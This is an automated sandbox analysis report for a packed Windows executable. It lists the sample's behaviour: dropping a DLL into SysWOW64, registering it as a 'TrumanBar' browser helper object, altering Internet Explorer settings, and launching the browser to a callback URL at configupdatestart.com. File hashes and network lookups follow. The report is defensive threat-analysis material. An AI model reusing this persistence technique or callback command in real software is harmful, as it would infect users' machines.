Analysis Overview
SHA256
c18f66b20db148aff2ff1bc3e2b6634cc8f6f6ed6842fa17839ef435a4ec3d84
Threat Level: Shows suspicious behavior
The file 8ffcef8076920d374af454c1f3b406f9 was found to show suspicious behavior.
Malicious Activity Summary
UPX packed file
Checks computer location settings
Loads dropped DLL
Installs/modifies Browser Helper Object
Drops file in System32 directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-04 19:42
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-04 19:42
Reported
2024-02-04 19:44
Platform
win7-20231215-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\eyfwin.dll | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\p.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\sf.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\c.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m3.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\s.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ios.dat | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d600000000020000000000106600000001000020000000cf8ac6bc8fa8769604a63ebe93d6118200f697d4b613160c3d89bf1d1645b0c5000000000e800000000200002000000002a985d210547b2a299733e6bd4d08a2e578b4e2741ce20bb519731f5dc4bf4e200000008d1d100079a736e85dd4272e362e24dfdb04ce326048c97092602d77823562ef40000000f0001a849e51b4be2201e502c56ab5160e1c93795a8c443e8b8bd10baa13cc8a6749e9b917dca9f4b1236977c4879d7396b00234a674747928efc5e07fd69182 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90c0c14ea257da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7A4C9A01-C395-11EE-A5E0-76D8C56D161B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413237593" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "ddf457 Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR\ = "C:\\Windows\\SysWow64\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID\ = "Ho4ydomoj" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe
"C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=3913842
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2372-0-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Windows\SysWOW64\eyfwin.dll
| MD5 | 732cadeaf934ac1edc47f1a577eca711 |
| SHA1 | 444f18e24d9c48e99b142c85ba6e65cba693988f |
| SHA256 | e232ef1159527f8ef57f480dcf0399d9b718354e90449545b1a3b7ea30015871 |
| SHA512 | 9b8a8e36b8e7292915a99a47796cd89dab6af4a506bf956093cbcefc24a4b7d3864f26c50d4b4326c38d03a8aca8c4be822e1702b436e9a97b1e084c6e9c0e5f |
memory/2372-29-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab320B.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar328B.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 94948acb994187ba726976dbc15668d1 |
| SHA1 | d2f4cd38a7fdc8f60d6996c1852d436e9a09cea3 |
| SHA256 | b30927ca399098e196bb7783fcff5731e799647189c97a9aa821f6e52ee0dfec |
| SHA512 | 1bc78a410bfe0674b1400adacea3ea8e30e4395ada83d4d0d6c6d11fb90b980b79cbfbec0af033475ddf2f1423309e589e6b55ce82775bae88874177acb91ec4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 30e4cdc2d137eebcae046057c2733c9b |
| SHA1 | 600cff8ea458649196055d8cb410b010b8948f27 |
| SHA256 | 0294f464c7aa4b5a882515a9922f7f836d407c809a261743f85fdb319cb0cb82 |
| SHA512 | abf1ec370543e9b149a25d567a42b60cbd982f5392b7b8f0a102852ea75c297dcb9528ec90fe9d206b2e090719d0c0bbf036dc60826cfe4a5d264df879fec768 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e459c8be50281da4046a613507d365a6 |
| SHA1 | 9eac1bf278cb9a6ee5ee9450af3aa56a13973fbd |
| SHA256 | 9c9b3993c57f2710594712029d10adb8b3f5a8208a1824f937734cf67f341f63 |
| SHA512 | 7927966bee9705450ca5ccadb91117beb5458e210ae832a29c7a90cef40b6cf5881ee76d494507b9e00d640f189bf3efc18c7a697e328798d05e69f124c8c414 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8974dafe9683042fb749ef1c95728ad8 |
| SHA1 | f342973a9fe0bb83d50f5256edeba0cd3fdb1c9c |
| SHA256 | 9f82fff5e9e551c5f06c23c1c1602538afd772d53b930bb8b57a704ae1021902 |
| SHA512 | 498b15100ad69a9fff85b80bf95cd68a6528916e69ee93d543a94d7cd42615e41a2e25d49054854e3b526ab819aa1b83f063b0da77c026a6d0d0b0c40cdd0700 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 876ab6fd75b174455e3d8ef78e3125cf |
| SHA1 | 4e25c5cbcb6a07889111644261c2097b7746e5ea |
| SHA256 | 785a61294b47e5f11561bd3399ed8fb457211cb1a7420a9e849773cc8519be17 |
